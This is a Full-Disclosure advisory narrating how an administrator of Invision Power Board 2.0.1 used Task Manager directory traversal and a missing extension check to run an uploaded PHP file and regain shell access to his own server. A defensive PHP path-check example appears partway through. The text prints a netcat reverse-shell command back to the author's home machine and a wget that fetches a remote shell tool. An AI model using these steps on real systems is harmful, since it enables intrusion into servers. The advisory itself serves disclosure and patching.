---------
Title: Invision Power Board
---------
Version: 2.0.1 (maybe more)
---------
Severity: Low
---------
Info: Invision Board Admin able to execute arbitrary code as uid of the apache process.
----------
Bug(s):
#1 Fails to jail the location of Task Manager scripts and allows directory traversal.
#2 The 'Task PHP File To Run' does not check for a '.php' extension and allows the user to run uploaded files with any extension, including Invision's '.ipb' upload extension.

-:Hack Your Own Server Through Invision Power Board Admin Console:-
by: Antimatt3r
email: antimatter@gmail.com

####################################################################

Problem
---------
Due to basically a lack of sleep and panic over seeing 20 sshd processes when doing a process listing, without thinking I did a 'killall -9 sshd' as root. I was immediately disconnected and said 'oh sh17'. I basically just severed my only ability to login to the box and had no means of rebooting it. I run a number of services but keep my system patched. Even the Invision Board has always been patched.

Background
---------
Collocated server 1200 miles away. No one has access to it for long periods of time, basically complete remote administration. I'm running a couple of forums. One of which uses version 2.0.1 of Invision Power Board.

Research\Exploit
---------
After long thoughts about what I was going to do to be able to get a term on the box and many people telling me "you're screwed", I figured I'd start at the weakest point on my box, which is the phpbb board (sorry phpbb but we all know it's true) used for another site. No obvious holes\misconfigurations. I then logged into the Invision Admin Console because it has a lot of features I've never even looked into and I wasn't sure what I could do. Now here is where it starts getting interesting. I was looking for something that would let me run or add my own php code so I could basically have a 'php shell'.
I stumbled across 'Task Manager' where it had some tasks it ran on a chronological basis or to run a task on demand. It also has the ability to add your own task. The tasks are .php files. The problem was that I still had to manually add the php file to the box in a hard coded './sources/tasks/' directory. You then have a field to add the filename for this path. I started with the basic '../../index.php' (this would be the path to the main index.php so I could be sure it was there) to see if this directory was jailed correctly. It wasn't (Bug #1)! But all I got from that was some errors when it tried to run the 'index.php' as a task file. So I still needed a way to get the file on there. I remember that you could add attachments to the forum and they were stored in the upload directory. The other thing I remember though was that the filenames were scrambled (or changed from what they really were to some kind of post information and a timestamp; for lack of a better word I'll call it a hash from now on) in this directory, so I would have no way of knowing what to point the task to. Before I even went down this path I tried adding '../../uploads/' to the task file name. Not that I thought putting a directory in would do anything, but just to see if it checked for a '.php' extension on the task file. It didn't (Bug #2)! It basically dumped out errors, but that was all I needed to see to know I should be able to pass anything and have the php code executed. The next thing I looked at was how you accessed attachments, hoping maybe I could find the hash name of the file. The link to an attachment looked like http://www.website.com/forum/index.php?act=Attach&type=post&id=27 so there was nothing there to go on, but it made me think the database must have some way of associating id=27 with the hash name. So I then did a full .sql dump, which you can do through the web interface. Trying to determine what 27 meant in 10MB of raw sql was not working.
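The two bugs above come down to one missing check on the 'Task PHP File To Run' value. The following is an added example (not Invision's own code, function names and the temp jail are constructed for the demo) showing the unchecked pattern next to a version that keeps task files inside './sources/tasks/' and restricted to '.php':

```php
<?php
// Added example, not Invision's own code: a hardened check for the Task
// Manager 'Task PHP File To Run' value that closes both bugs in the post.
// Function names and the temp jail are constructed for the demo.
declare(strict_types=1);

// Vulnerable pattern as the post describes it: the admin-supplied name is
// appended to './sources/tasks/' unchecked, so '../../index.php' or
// '../../uploads/post-5-1130919619.ipb' ends up being included.
function vulnerable_task_path(string $task_dir, string $task_file): string
{
    return $task_dir . '/' . $task_file;
}

// Hardened version: returns the absolute file to run, or null on rejection.
function safe_task_path(string $task_dir, string $task_file): ?string
{
    // Bug #1 and #2: a task is a bare file name ending in .php, nothing else
    // (no slashes, extra dots, NUL bytes or '.ipb' upload extensions).
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $task_file)) {
        return null;
    }
    $jail = realpath($task_dir);
    $path = realpath($task_dir . '/' . $task_file);
    if ($jail === false || $path === false) {
        return null;                                // jail or file missing
    }
    // Defence in depth: realpath() follows symlinks, so a link named x.php
    // that points into uploads/ is still caught by the containment check.
    if (strncmp($path, $jail . DIRECTORY_SEPARATOR, strlen($jail) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed jail with one legitimate task so the demo runs anywhere.
$jail = sys_get_temp_dir() . '/ipb_tasks_demo';
@mkdir($jail, 0700, true);
file_put_contents($jail . '/cleanup.php', "<?php // harmless task\n");

foreach (['cleanup.php',
          '../../index.php',                         // post: Bug #1
          '../../uploads/',                          // post: Bug #2
          '../../uploads/post-5-1130919619.ipb',     // post: the .ipb upload
          'cleanup.php.ipb'] as $name) {
    $ok = safe_task_path($jail, $name);
    printf("%-40s -> %s\n", $name, $ok === null ? 'REJECTED' : 'run ' . $ok);
}
```

Only 'cleanup.php' passes; every traversal or non-.php name is rejected before anything is included.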
I then went back to the Admin Interface and looked at the 'SQL Toolbox'. From here you could click any of the tables and a command would be presented so you could run it and see everything in the table. So there was a table called ibf_attachments and I ran the sql cmd 'select * from ibf_attachments'. This gave me the info I needed for what the real uploaded file name was being mapped to in the uploads directory. (I noticed what looked like a keyword combined with a timestamp and given a .ipb extension.) So I uploaded my 'php shell' file by posting a topic in the forum and adding it as an attachment, found what the name of the file was being stored on the local disk as from the database, and then added this to the path of my task file to be executed so it looked something like '../../uploads/post-5-1130919619.ipb'. Then I just clicked the task run now link in the Admin CP that would execute the script. This kind of worked and I was presented with a place to enter commands that should run, but when I would post one of the commands I would get kicked back to the login screen for the admin control panel. I didn't really look into why; I'm assuming I was supposed to post some session key, but I didn't want to go through all that since I figured I could just easily run some commands with the system() php command as the Apache user. So I then wrote a very simple php script to connect back to my home computer over a netcat session ('netcat myhouseip myport -e /bin/bash'). I did the same trick of uploading the php code as an attachment, finding the locally stored name, and editing my task to the new path. I then set up my box to listen for the connection (netcat -l -p ). I once again clicked the 'Run Task Now' link. This time the page just held in the loading state. This was because it had executed my netcat code and was waiting for the pipe to be closed.
Once connected I realized I couldn't su to the root user or any other user because the input for the password was the stdin on the remote box. I tried to start ssh but it complained about missing keys. I needed a shell that had a terminal attached. I remember from a wargame before using tiny shell and being able to do more commands. A quick search on Google confirmed this would be what I needed. From my netcat session I was able to do a wget to grab the tiny shell 0.6 src (wget http://www.cr0.net:8040/code/network/tsh-0.6.tgz). I had one port above 1024 that had been left open in iptables for a web interface to a game server that was no longer running (long live UT99). I had to edit the 'tsh.h' file by using echos and redirection since I could not use vi from my netcat term (I could have also used the Connect Back option in Tiny Shell if I didn't have an open port). From there I just had to build the application (make linux) and execute the daemon (./tshd). I built it with the same option and ran the client (./tsh serverip). I was connected and given the shell I needed. I immediately su'd and restarted the ssh daemon.

Conclusion
---------
I would have to say this is a very low severity for most people because you have to be an admin on an Invision Board to be able to do this in the first place. But if the Invision Board is being provided as a service (like the one provided at http://www.invisionboard.com) then the admin can now get elevated privileges and a shell as the uid of the apache process, so in this case it is more serious. Or this can also be very useful if you do something stupid like killing sshd where rebooting is not an option.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/